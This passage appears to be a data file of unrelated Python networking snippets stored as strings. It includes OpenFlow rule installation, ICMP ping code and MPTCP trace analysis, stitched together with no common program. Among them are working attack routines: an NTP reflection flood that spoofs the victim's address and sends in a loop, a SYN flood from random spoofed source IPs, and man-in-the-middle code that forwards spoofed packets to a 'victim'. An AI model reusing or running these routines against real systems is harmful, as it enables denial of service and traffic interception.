(eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + 
str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def onPing(self, payload):", "def send_one_ping(my_socket, dest_addr, id):\n dest_addr = socket.gethostbyname(dest_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, my_checksum, id, 1)\n bytes_in_double = struct.calcsize(\"d\")\n data = (192 - bytes_in_double) * \"Q\"\n data = struct.pack(\"d\", time.time()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = checksum(header + data)\n\n # Now that we have the right checksum, we put that in. 
It's just easier\n # to make up a new header than to stuff it into the dummy.\n header = struct.pack(\n \"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), id, 1\n )\n packet = header + data\n my_socket.sendto(packet, (dest_addr, 1)) # Don't know about the 1", "def send_p():\n while 1:\n if PACKET_QUEUE:\n mpkt = PACKET_QUEUE.pop()\n sendp(mpkt, iface=IFACE, loop=0) # forward spoofed packet to the victim", "def scapy_create_send_ICMP_customized(self, ipdst, ipsrc, send1=True, \\\n macdst=None, macsrc=None):\n ip_header = self.define_ip_header(dst=ipdst, src=ipsrc,\\\n ttl=self.ipttl, version=self.version)\n icmp_header = self.define_icmp_header(version=self.version)\n if send1:\n if (macdst == None):\n send(ip_header/icmp_header, verbose=self.verbose)\n else:\n ether_header = self.define_ethernet_header(src=macsrc, \\\n dst=macdst)\n sendp(ether_header/ip_header/icmp_header, verbose=self.verbose, \\\n iface=self.sourceiface)\n return\n\n pktcount = self.pktcount\n # If user does not specify pktcount, need calculate it based on\n # duration and interval\n if (pktcount == 0):\n pktcount = int(self.duration*1000/self.interval)\n send(ip_header/icmp_header, count=pktcount, inter=self.interval/1000.0,\n verbose=self.verbose)", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def main():\n args = TrafficScriptArg(\n [u\"src_mac\", u\"dst_mac\", u\"src_ip\", u\"dst_ip\", u\"dscp\"]\n )\n\n rxq = RxQueue(args.get_arg(u\"rx_if\"))\n txq = TxQueue(args.get_arg(u\"tx_if\"))\n\n src_mac = args.get_arg(u\"src_mac\")\n dst_mac = args.get_arg(u\"dst_mac\")\n src_ip = args.get_arg(u\"src_ip\")\n dst_ip = args.get_arg(u\"dst_ip\")\n dscp = int(args.get_arg(u\"dscp\"))\n\n ip_layer = IPv6 if ip_address(src_ip).version == 6 else IP\n\n sent_packets = list()\n pkt_send = (Ether(src=src_mac, dst=dst_mac) /\n ip_layer(src=src_ip, dst=dst_ip) /\n TCP())\n\n pkt_send /= Raw()\n sent_packets.append(pkt_send)\n txq.send(pkt_send)\n\n while True:\n pkt_recv = rxq.recv(2, sent_packets)\n if pkt_recv is None:\n raise RuntimeError(u\"ICMPv6 echo reply Rx timeout\")\n\n if pkt_recv.haslayer(ICMPv6ND_NS):\n # read another packet in the queue if the current one is ICMPv6ND_NS\n continue\n elif pkt_recv.haslayer(ICMPv6MLReport2):\n # read another packet in the queue if the current one is\n # ICMPv6MLReport2\n continue\n elif pkt_recv.haslayer(ICMPv6ND_RA):\n # read another packet in the queue if the current one is\n # ICMPv6ND_RA\n continue\n\n # otherwise process the current packet\n break\n\n if pkt_recv is None:\n raise RuntimeError(u\"Rx timeout\")\n\n if ip_layer == IP:\n check_ipv4(pkt_recv, dscp)\n else:\n check_ipv6(pkt_recv, dscp)\n\n sys.exit(0)", "def SynAckAttack(host, cmds):\n\tprint(\"\\n###########################################\")\n\tprint(\"# Starting SYN ACK Attack..\")\n\tprint(\"###########################################\\n\")\n\t# ports=[]\n\ttry:\n\t\tamount = int(cmds[3])\n\texcept IndexError:\n\t\tamount = 1\n\ttry:\n\t\tports = cmds[2]\n\t\tports = [int(p) for p in ports.split('.')]\n\texcept IndexError:\n\t\tports = []\n\n\t# hosts = state.host_and_ports.keys()\n\t# ports = []\n\tif not ports:\n\t\tprint(\"***\\n[e]: No ports were specifed, please enter them like so: 80,81,88,3000\")\n\t\tprint(\"[cmds]: \", cmds)\n\t\tprint()\n\t\treturn\n\ttry:\n\t\t\t# for host in hosts:\n\t#\tprint(f\"# Attacking Target: 
{host}\")\n\t\tfor hostPort in ports:\n\t\t\tfor x in range(0, amount):\n\t\t\t\t# Build a random packet\n\t\t\t\ts_port = randInt()\n\t\t\t\ts_eq = randInt()\n\t\t\t\tw_indow = randInt()\n\n\t\t\t\tIP_Packet = IP()\n\t\t\t\tIP_Packet.src = randomIP()\n\t\t\t\tIP_Packet.dst = host\n\n\t\t\t\tTCP_Packet = TCP()\n\t\t\t\tTCP_Packet.sport = s_port\n\t\t\t\tTCP_Packet.dport = hostPort\n\t\t\t\tTCP_Packet.flags = \"S\"\n\t\t\t\tTCP_Packet.seq = s_eq\n\t\t\t\tTCP_Packet.window = w_indow\n\n\t\t\t\t# Send the packet\n\t\t\t\tsend(IP_Packet/TCP_Packet)\n\t\tprint()\n\t\tprint('***')\n\t\tprint(\"packets explanation:\")\n\t\tprint(\"sent %s packets of this form: \" % amount)\n\t\tIP_Packet.show()\n\t\tprint(\"ihl: internet header length\")\n\t\tprint(\"tos: type of service\")\n\t\tprint(\"frag: fragement offset\")\n\t\tprint(\"ttl: time to live [s]\")\n\t\tprint(\"proto: Protocol num, 0 = IPv6\")\n\t\tprint(\"chksum: check sum for error checking\")\n\t\tprint(\"***\")\n\t\tprint('TCP SYN packet: ')\n\t\tTCP_Packet.show()\n\t\tprint(\"sport: identifies sending port\")\n\t\tprint(\"dport: identifies receiving port\")\n\t\tprint(\"seq: seqence number. Dual role. If SYN flag is set (1), it's initial seqence number.\")\n\t\tprint(\" if flag is clear (0) this is accumulated seqence number for current session.\")\n\t\tprint(\"ack: ack number. If ACK flag set then this value is what sender of ACK expects to get back\")\n\t\tprint(\"dataofs: specifies the size of the TCP header in 32-bit words\")\n\t\tprint(\"flags: there are 9 1-bit flags\")\n\t\tprint(\"window: size of data windows sender of segment willing to receive back\")\n\t\tprint(\"chksum: error checking checksum\")\n\t\tprint(\"urgptr: position offset from the seqence number of last urgent data byte.\")\n\t\t# get grasp of all flags set in the Scapy TCP packet\n\t\t# obv, it's going to just be SYN, set with 'S'\n\t\tflags_vals = {\n\t\t\t'F': 0,\n\t\t\t'S': 0,\n\t\t\t'R': 0,\n\t\t\t'P': 0,\n\t\t\t'A': 0,\n\t\t\t'U': 0,\n\t\t\t'E': 0,\n\t\t\t'C': 0,\n\t\t}\n\t\tflags = {\n\t\t\t'F': 'FIN',\n\t\t\t'S': 'SYN',\n\t\t\t'R': 'RST',\n\t\t\t'P': 'PSH',\n\t\t\t'A': 'ACK',\n\t\t\t'U': 'URG',\n\t\t\t'E': 'ECE',\n\t\t\t'C': 'CWR',\n\t\t\t}\n\t\tfor f in TCP_Packet.sprintf('%TCP.flags%'):\n\t\t\tflags_vals[f] = 1\n\t\tprint('flags set in TCP SYN packet')\n\t\tprint([flags[x] for x in TCP_Packet.sprintf('%TCP.flags%')])\n\t\tprint(flags_vals)\n\texcept Exception as e:\n\t\tprint('in ping flood: ')\n\t\tprint('something was wrong with arguments: ', cmds)\n\t\tprint('\\n', e)\n\t\treturn", "def recv(sock: socket.socket, dest: io.BufferedIOBase) -> int:\r\n pktsRecv = []\r\n acksSent = []\r\n pause = .1\r\n num_bytes = 0\r\n while True:\r\n # Receive packets\r\n data = sock.recv(util.MAX_PACKET)\r\n if not data:\r\n break\r\n message, seq_num = getInfo(data)\r\n print(\"***********************************************************\")\r\n print(\"Received sequence number:\" , seq_num)\r\n # Create and send acks\r\n ack_num = int(seq_num) + len(message)\r\n ack = ack_num.to_bytes(3, \"big\")\r\n print(\"Sending ack:\", ack_num)\r\n if ack_num not in acksSent:\r\n dest.write(bytes(str.encode(message)))\r\n dest.flush()\r\n acksSent.append(ack_num)\r\n pktsRecv.append(bytes(str.encode(message)))\r\n sock.send(ack)\r\n num_bytes += len(message)\r\n return num_bytes", "def ping(self,dest):\n\t\tself.tn.write('ping -c 4 %s\\n'%(dest))\n\t\tself.tn.write('exit\\n')\n\t\tresp = self.tn.read_all()\n\t\treturn resp", "def dosEm(target, ntplist, data, currentserver):\n 
ntpserver = ntplist[currentserver] #LOAD THE SERVER\n    packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD THE PACKET\n    send(packet,loop=1) #SEND ", "def process_mptcp_pkt_from_client(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n    dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n    conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n    flow_id = acks[saddr, sport, daddr, dport][co.FLOW_ID]\n    if conn_acks[conn_id][co.S2C] >= 0:\n        max_val = 2**64 if dss_is_8_bytes else 2**32\n        bytes_acked = (dack - conn_acks[conn_id][co.S2C]) % max_val\n        if bytes_acked >= 2000000000:\n            # Ack of 2GB or more is just not possible here\n            return\n\n        size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n        if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_C2S] and (dss - conn_acks[conn_id][co.C2S]) % max_val < 2000000000\n                and (mptcp_connections[conn_id].attr[co.C2S][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n            # This is a DSS retransmission! (take into account the seq overflow)\n            mptcp_connections[conn_id].attr[co.C2S][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_C2S][dss][2],\n                                                                            ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][0],\n                                                                            ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][1],\n                                                                            ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]))\n            conn_acks[conn_id][HSEQ_C2S][dss][1] = ts_delta\n        elif size_payload > 0 and dss is not False:\n            conn_acks[conn_id][SEQ_C2S].add(dss)\n            conn_acks[conn_id][HSEQ_C2S][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]]\n\n    conn_acks[conn_id][co.S2C] = dack\n    acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta\n    conn_acks[conn_id][co.TIMESTAMP][CLIENT] = ts_delta", "def sendPing(self, payload=None):", "def receive_ping(my_socket, timeout):\n    start_time = timeout\n    while True:\n        start_select = time.process_time()\n        # select.select(rlist, wlist, xlist[, timeout])\n        # wait until ready for read / write / exceptional condition\n        # The return value is a triple of lists\n        what_ready = select.select([my_socket], [], [], start_time)\n        how_long = (time.process_time() - start_select)\n        if what_ready[0] == []: #timeout\n            return\n\n        time_received = time.process_time()\n        # socket.recvfrom(bufsize[, flags])\n        # The return value is a pair (string, address)\n        rec_packet, addr = my_socket.recvfrom(1024)\n        icmp_header = rec_packet[20 : 28]\n        icmp_buff= rec_packet[28 : ]\n        ip_type, code, checksum, packet_ID, sequence = struct.unpack(\"bbHHh\", icmp_header)\n        #if ip_type != 8 and packet_ID == ID: # ip_type should be 0\n        if ip_type != 8: # ip_type should be 0\n            byte_in_double = struct.calcsize(\"d\")\n            time_sent = struct.unpack(\"d\", rec_packet[28 : 28 + byte_in_double])[0]\n            return time_received - time_sent\n        else:\n            print('Got icmp:')\n            print(icmp_buff)\n            return timeout\n        start_time = start_time - how_long\n        if start_time <= 0:\n            return", "def validate_ping(result):\n    if '0 packets received' in str(result) or 'no answer from' in str(result) or '0 received' in str(result):\n        print 'Connectivity - DOWN'\n        return False\n    print 'Connectivity - OK'\n    return True", "def hmVerifyMsgCRCOK(destination, protocol, source, expectedFunction, expectedLength, datal) :\r\n    badresponse = 0\r\n    if protocol == constants.HMV3_ID:\r\n        checksum = datal[len(datal)-2:]\r\n        rxmsg = datal[:len(datal)-2]\r\n        crc = crc16() # Initialises the CRC\r\n        expectedchecksum = crc.run(rxmsg)\r\n        if expectedchecksum == checksum:\r\n            print(\"CRC is correct\")\r\n        else:\r\n            
print(\"CRC is INCORRECT\")\r\n s = \"Incorrect CRC: %s Expected: %s \\n\" % (datal, expectedchecksum)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n # Check the response\r\n dest_addr = datal[0]\r\n frame_len_l = datal[1]\r\n frame_len_h = datal[2]\r\n frame_len = (frame_len_h << 8) | frame_len_l\r\n source_addr = datal[3]\r\n func_code = datal[4]\r\n\r\n\r\n\r\n if (dest_addr != 129 and dest_addr != 160):\r\n print(\"dest_addr is ILLEGAL\")\r\n s = \"%s : Controller %s : Illegal Dest Addr: %s\\n\" % (localtime, loop, dest_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (dest_addr != destination):\r\n print(\"dest_addr is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect Dest Addr: %s\\n\" % (localtime, loop, dest_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (source_addr < 1 or source_addr > 32):\r\n print(\"source_addr is ILLEGAL\")\r\n s = \"%s : Controller %s : Illegal Src Addr: %s\\n\" % (localtime, loop, source_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (source_addr != source):\r\n print(\"source addr is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect Src Addr: %s\\n\" % (localtime, loop, source_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code != constants.FUNC_WRITE and func_code != constants.FUNC_READ):\r\n print(\"Func Code is UNKNWON\")\r\n s = \"%s : Controller %s : Unknown Func Code: %s\\n\" % (localtime, loop, func_code)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code != expectedFunction):\r\n print(\"Func Code is UNEXPECTED\")\r\n s = \"%s : Controller %s : Unexpected Func Code: %s\\n\" % (localtime, loop, func_code)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code == constants.FUNC_WRITE and frame_len != 7):\r\n # Reply to Write is always 7 long\r\n print(\"response length is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect length: %s\\n\" % (localtime, loop, frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (len(datal) != frame_len):\r\n print(\"response length MISMATCHES header\")\r\n s = \"%s : Controller %s : Mismatch length: %s %s\\n\" % (localtime, loop, len(datal), frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n \"\"\"if (func_code == constants.FUNC_READ and expectedLength !=len(datal) ):\r\n # Read response length is wrong\r\n print(\"response length not EXPECTED value\")\r\n print(len(datal))\r\n print(datal)\r\n s = \"%s : Controller %s : Incorrect length: %s\\n\" % (localtime, loop, frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\"\"\"\r\n if (badresponse == 0):\r\n return True\r\n else:\r\n return False\r\n\r\n else:\r\n assert 0, \"Un-supported protocol found %s\" % protocol", "def ping(msg):\n return msg", "def _send(self,msg):\n attempts = 3\n while attempts > 0:\n self.sock.sendto(msg, self.ip_port)\n ready = select.select([self.sock], [], [], self.timeout)\n if ready[0]:\n data, ip_port = self.sock.recvfrom(60)\n if ip_port != self.ip_port: continue\n return decode(data)\n attempts -= 1\n print(\"Retrying send\")\n return None", "def process_mptcp_pkt_from_server(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n flow_id = acks[daddr, dport, saddr, sport][co.FLOW_ID]\n if conn_acks[conn_id][co.C2S] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.C2S]) % max_val\n if bytes_acked >= 
2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_S2C] and (dss - conn_acks[conn_id][co.S2C]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.S2C][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission!\n mptcp_connections[conn_id].attr[co.S2C][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_S2C][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]))\n conn_acks[conn_id][HSEQ_S2C][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_S2C].add(dss)\n conn_acks[conn_id][HSEQ_S2C][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]]\n\n conn_acks[conn_id][co.C2S] = dack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][SERVER] = ts_delta", "def on_ctcp(self, raw_msg, source, msg, **kwargs):", "def process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[saddr, sport, daddr, dport][co.S2C] >= 0:\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.S2C][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[saddr, sport, daddr, dport][co.S2C]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.S2C][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n # If SOCKS command\n if size_payload == 7 and connections[conn_id].attr.get(co.SOCKS_PORT, None) is None:\n crypted_socks_cmd = tcp.data\n # This is possible because of packet stripping\n if len(crypted_socks_cmd) == 7:\n decrypted_socks_cmd = socks_parser.decode(crypted_socks_cmd)\n if decrypted_socks_cmd[0] == b'\\x01': # Connect\n connections[conn_id].attr[co.SOCKS_DADDR] = socks_parser.get_ip_address(decrypted_socks_cmd)\n connections[conn_id].attr[co.SOCKS_PORT] = socks_parser.get_port_number(decrypted_socks_cmd)\n\n if size_payload > 0 and tcp.seq in acks[saddr, sport, daddr, dport][SEQ_C2S]:\n # This is a retransmission! 
(take into account the seq overflow)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][0],\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1],\n ts_delta - acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT]))\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[saddr, sport, daddr, dport][SEQ_C2S].add(tcp.seq)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[saddr, sport, daddr, dport][SEQ][co.C2S]) >= 3000000:\n# for x in range(50000):\n# acks[saddr, sport, daddr, dport][SEQ][co.C2S].popleft()\n\n acks[saddr, sport, daddr, dport][co.S2C] = tcp.ack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta", "def send_one_ping(self, current_socket):\n from struct import pack\n from sys import byteorder\n\n def calculate_checksum(source_string):\n \"\"\"A port of the functionality of in_cksum() from ping.c\n Ideally this would act on the string as a series of 16-bit ints (host\n packed), but this works.\n Network data is big-endian, hosts are typically little-endian\n \"\"\"\n countTo = (int(len(source_string) / 2)) * 2\n sum = 0\n count = 0\n\n # Handle bytes in pairs (decoding as short ints)\n loByte = 0\n hiByte = 0\n while count < countTo:\n if (byteorder == \"little\"):\n loByte = source_string[count]\n hiByte = source_string[count + 1]\n else:\n loByte = source_string[count + 1]\n hiByte = source_string[count]\n sum = sum + (ord(hiByte) * 256 + ord(loByte))\n count += 2\n\n # Handle last byte if applicable (odd-number of bytes)\n # Endianness should be irrelevant in this case\n if countTo < len(source_string): # Check for odd length\n loByte = source_string[len(source_string) - 1]\n sum += ord(loByte)\n\n sum &= 0xffffffff # Truncate sum to 32 bits (a variance from ping.c, which\n # uses signed ints, but overflow is unlikely in ping)\n\n sum = (sum >> 16) + (sum & 0xffff) # Add high 16 bits to low 16 bits\n sum += (sum >> 16) # Add carry from above (if any)\n answer = ~sum & 0xffff # Invert and truncate to 16 bits\n answer = socket.htons(answer)\n\n return answer\n\n ICMP_ECHO = 8 # Echo request (per RFC792)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n checksum = 0\n\n # Make a dummy header with a 0 checksum.\n header = pack(\n \"!BBHHH\", ICMP_ECHO, 0, checksum, self.own_id, self.seq_number\n )\n\n padBytes = []\n startVal = 0x42\n for i in range(startVal, startVal + (self.packet_size)):\n padBytes += [(i & 0xff)] # Keep chars in the 0-255 range\n data = bytes(padBytes)\n\n # Calculate the checksum on the data and the dummy header.\n checksum = calculate_checksum(header + data) # Checksum is in network order\n\n # Now that we have the right checksum, we put that in. 
It's just easier\n        # to make up a new header than to stuff it into the dummy.\n        header = pack(\n            \"!BBHHH\", ICMP_ECHO, 0, checksum, self.own_id, self.seq_number\n        )\n\n        packet = header + data\n\n        send_time = self.timer()\n\n        try:\n            current_socket.sendto(packet, (self.destination, 1)) # Port number is irrelevant for ICMP\n        except socket.error as e:\n            current_socket.close()\n            return\n\n        return send_time", "def receive_one_ping(mySocket, myID, timeout):\n    timeLeft = timeout/1000\n\n    while True: # Loop while waiting for the packet or the timeout \n        startedSelect = default_timer() # This function returns the elapsed time along with the CPU time and is platform dependent. \n\n        whatReady = select.select([mySocket], [], [], timeLeft)\n        howLongInSelect = (default_timer() - startedSelect)\n        if whatReady[0] == []: # timeout\n            return None, 0, 0, 0, 0\n\n        timeReceived = default_timer() # This function returns the elapsed time along with the CPU time and is platform dependent. \n\n        \"\"\"\n        Receive data from the socket. The return value is a pair (bytes, address) where bytes is a bytes object representing\n        the data received and address is the address of the socket sending the data \n        \"\"\"\n        recPacket, addr = mySocket.recvfrom(ICMP_MAX_RECV) \n\n        \"\"\"\n        struct.unpack( fmt , string ) \n        Unpack the string (presumably packed by ) according to the given format. \n        The result is a tuple, even if it contains exactly one item.\n        \"\"\"\n        ipHeader = recPacket[:20]\n        iphVersion, iphTypeOfSvc, iphLength, \\\n        iphID, iphFlags, iphTTL, iphProtocol, \\\n        iphChecksum, iphSrcIP, iphDestIP = struct.unpack(\n            \"!BBHHHBBHII\", ipHeader\n        )\n\n        icmpHeader = recPacket[20:28]\n        icmpType, icmpCode, icmpChecksum, \\\n        icmpPacketID, icmpSeqNumber = struct.unpack(\n            \"!BBHHH\", icmpHeader\n        )\n\n        if icmpPacketID == myID:\n            dataSize = len(recPacket) - 28\n            # returns the response time, the data size, the pinged source IP, the seq number, id and timeout \n            return timeReceived, (dataSize+8), iphSrcIP, icmpSeqNumber, iphTTL\n\n        timeLeft = timeLeft - howLongInSelect\n        if timeLeft <= 0:\n            return None, 0, 0, 0, 0 # returns nothing ", "def echo_reply_handler(self, ev):\n        now_timestamp = time.time()\n        try:\n            latency = now_timestamp - eval(ev.msg.data)\n            self.echo_latency[ev.msg.datapath.id] = latency\n        except:\n            return", "def get_ICMP_echo(payload_size, seq):\r\n    icmp_type = 8\r\n    icmp_code = 0\r\n    init_checksum = 0\r\n    icmp_id = random.randint(0, 0xFFFF)\r\n    icmp_seq = seq\r\n    _checksum = struct.pack(\"!BBHHH\", icmp_type, icmp_code, init_checksum,\r\n                            icmp_id, icmp_seq)\r\n\r\n    payload = \"\"\r\n    for i in range(payload_size):\r\n        payload += 'a'\r\n    payload = bytes(payload, 'utf-8')\r\n\r\n    icmp_checksum = get_checksum(_checksum + payload)\r\n\r\n    header = struct.pack(\"!BBHHH\", icmp_type, icmp_code, icmp_checksum,\r\n                         icmp_id, icmp_seq)\r\n\r\n    return header + payload", "def _arp_send(dp, port_out, arp_code, ip_sender, ip_target, eth_dst='ff:ff:ff:ff:ff:ff',eth_src=None,eth_target='00:00:00:00:00:00'):\n\n    ofp = dp.ofproto\n    parser = dp.ofproto_parser\n    pkt = packet.Packet()\n\n    # HACK: to 